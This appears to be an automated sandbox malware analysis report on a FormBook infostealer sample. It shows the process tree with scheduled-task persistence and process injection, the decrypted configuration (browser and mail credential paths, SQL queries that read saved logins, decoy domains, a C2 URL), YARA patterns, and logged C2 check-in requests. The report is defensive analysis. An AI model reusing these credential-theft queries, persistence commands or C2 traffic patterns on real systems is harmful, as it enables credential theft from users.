Loading ...

Play interactive tourEdit tour

Analysis Report JAAkR51fQY.exe

Overview

General Information

Sample Name:JAAkR51fQY.exe
Analysis ID:339314
MD5:1dd3dda596f5391bb865683fa49b531e
SHA1:37eab36b9caabc5e1d55086da5c46bc50b012fca
SHA256:2abb16d594f4b36fc8b8aab8cab7736350421c619cec8e12e8975e87f7a99faa
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • JAAkR51fQY.exe (PID: 2204 cmdline: 'C:\Users\user\Desktop\JAAkR51fQY.exe' MD5: 1DD3DDA596F5391BB865683FA49B531E)
    • schtasks.exe (PID: 6008 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vbc.exe (PID: 4144 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
    • vbc.exe (PID: 2412 cmdline: {path} MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4768 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6228 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "slgacha.com", "oohdough.com", "6983ylc.com", "aykassociate.com", "latin-hotspot.com", "starrockindia.com", "beamsubway.com", "queensboutique1000.com", "madbaddie.com", "bhoomimart.com", "ankitparivar.com", "aldanasanchezmx.com", "citest1597669833.com", "cristianofreitas.com", "myplantus.com", "counterfeitmilk.com", "8xf39.com", "pregnantwomens.com", "yyyut6.com", "stnanguo.com", "fessusesefsee.com", "logansshop.net", "familydalmatianhomes.com", "accessible.legal", "epicmassiveconcepts.com", "indianfactopedia.com", "exit-divorce.com", "colliapse.com", "nosishop.com", "hayat-aljowaily.com", "soundon.events", "previnacovid19-br.com", "traptlongview.com", "splendidhotelspa.com", "masterzushop.com", "ednevents.com", "studentdividers.com", "treningi-enduro.com", "hostingcoaster.com", "gourmetgroceriesfast.com", "thesouthbeachlife.com", "teemergin.com", "fixmygearfast.com", "arb-invest.com", "shemaledreamz.com", "1819apparel.com", "thedigitalsatyam.com", "alparmuhendislik.com", "distinctmusicproductions.com", "procreditexpert.com", "insights4innovation.com", "jzbtl.com", "1033325.com", "sorteocamper.info", "scheherazadelegault.com", "glowportraiture.com", "cleitstaapps.com", "globepublishers.com", "stattests.com", "brainandbodystrengthcoach.com", "magenx2.info", "escaparati.com", "wood-decor24.com", "travelnetafrica.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.herbmedia.net/csv8/\u0000"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.228381920.0000000002A91000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
    0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x166b9:$sqlite3step: 68 34 1C 7B E1
      • 0x167cc:$sqlite3step: 68 34 1C 7B E1
      • 0x166e8:$sqlite3text: 68 38 2A 90 C5
      • 0x1680d:$sqlite3text: 68 38 2A 90 C5
      • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
      • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
      00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
        Click to see the 18 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          4.2.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x158b9:$sqlite3step: 68 34 1C 7B E1
          • 0x159cc:$sqlite3step: 68 34 1C 7B E1
          • 0x158e8:$sqlite3text: 68 38 2A 90 C5
          • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
          • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
          • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
          4.2.vbc.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            4.2.vbc.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
            • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
            • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
            • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
            • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
            • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
            • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
            • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
            • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
            • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
            • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
            Click to see the 1 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\JAAkR51fQY.exe' , ParentImage: C:\Users\user\Desktop\JAAkR51fQY.exe, ParentProcessId: 2204, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\zLIpEDZOH' /XML 'C:\Users\user\AppData\Local\Temp\tmp8416.tmp', ProcessId: 6008

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for URL or domainShow sources
            Source: http://www.yyyut6.com/csv8/www.alparmuhendislik.comAvira URL Cloud: Label: phishing
            Source: http://www.yyyut6.comAvira URL Cloud: Label: phishing
            Source: http://www.yyyut6.com/csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyfAvira URL Cloud: Label: phishing
            Source: http://www.yyyut6.com/csv8/Avira URL Cloud: Label: phishing
            Found malware configurationShow sources
            Source: 4.2.vbc.exe.400000.0.unpackMalware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79e0", "KEY1_OFFSET 0x1bbc8", "CONFIG SIZE : 0xc1", "CONFIG OFFSET 0x1bc99", "URL SIZE : 24", "searching string pattern", "strings_offset 0x1a6a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xa0e749e3", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715030", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e4", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01355", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "----------------------------
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\zLIpEDZOH.exeReversingLabs: Detection: 31%
            Multi AV Scanner detection for submitted fileShow sources
            Source: JAAkR51fQY.exeVirustotal: Detection: 31%Perma Link
            Source: JAAkR51fQY.exeReversingLabs: Detection: 31%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\zLIpEDZOH.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: JAAkR51fQY.exeJoe Sandbox ML: detected
            Source: 0.2.JAAkR51fQY.exe.6d0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
            Source: 4.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeUnpacked PE file: 0.2.JAAkR51fQY.exe.6d0000.0.unpack
            Source: JAAkR51fQY.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: JAAkR51fQY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.269880810.00000000057AF000.00000040.00000001.sdmp, wlanext.exe, 0000000A.00000002.587511214.0000000002E60000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: vbc.exe, wlanext.exe
            Source: Binary string: wlanext.pdb source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp
            Source: Binary string: vbc.pdb source: wlanext.exe, 0000000A.00000002.592768859.0000000003647000.00000004.00000001.sdmp
            Source: Binary string: wlanext.pdbGCTL source: vbc.exe, 00000004.00000002.269706677.0000000005660000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 4x nop then jmp 07922DADh
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeCode function: 4x nop then jmp 07922DADh
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 104.21.13.175:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 34.102.136.180:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49760 -> 99.83.185.45:80
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49761 -> 104.21.13.175:80
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Z54U04wqGI300YwketVjcixyHBr4HpwtQE6vF0nldb1Lz0z4UH78CnHRphUFHPRBURpw&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.colliapse.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=Vx5DYRfwQ2epFb7A1EFDXiUpfmaHAUA5hBGztbTHqIjku20m3oo4TlvQkKcY2MtY2Zvt&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.masterzushop.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=9kzRsbxjodB183f+254XmaaPYHqImudbPq/bqqkJnFvk55YE4DuWwUiPiLBFKkj0LF/s&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.aldanasanchezmx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=wz9bsKZezgylXE2xySv04yz/UXtzAnP44BanueQcObrBh8vQr+0W6/ezJrtA4EzaB/eD&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.bhoomimart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=XH4K2dDF2Z84HBPAGb7BC8YK+Vs0QVFZSQgY+MY/R5kdga2e+ACccNk2g5CQED5lfKqn&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.yyyut6.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=qrM/jq4OcB9vG2RwEV9Oj1wgtu+jolIiSW/njvsFRiZ9j79vyWJq+CFtdr2TsRW1k8yh&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.alparmuhendislik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=QLtdsMlXP7ZQlvjWT7fAeOzLoSV1+fXm7wWs73uECgmLouwXj2mCPN/rnODxivVfv92N&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.globepublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=SPYfUtJhDLYzT/ro+iJTgsw3x4bzIhIKNu8aW1ARl1xXF5uYI7qDVxucqZEX6pWizqEA&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.thedigitalsatyam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /csv8/?EZUXxJ=0hV2NfdVjmx+yfQvTLszaaA4nyOLrpeuP9TqtJZz9egJMD1sBqTfWGO8dwDzLIh3ahLd&DzrLH=VBZHYDrxndGXyf HTTP/1.1Host: www.scheherazadelegault.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
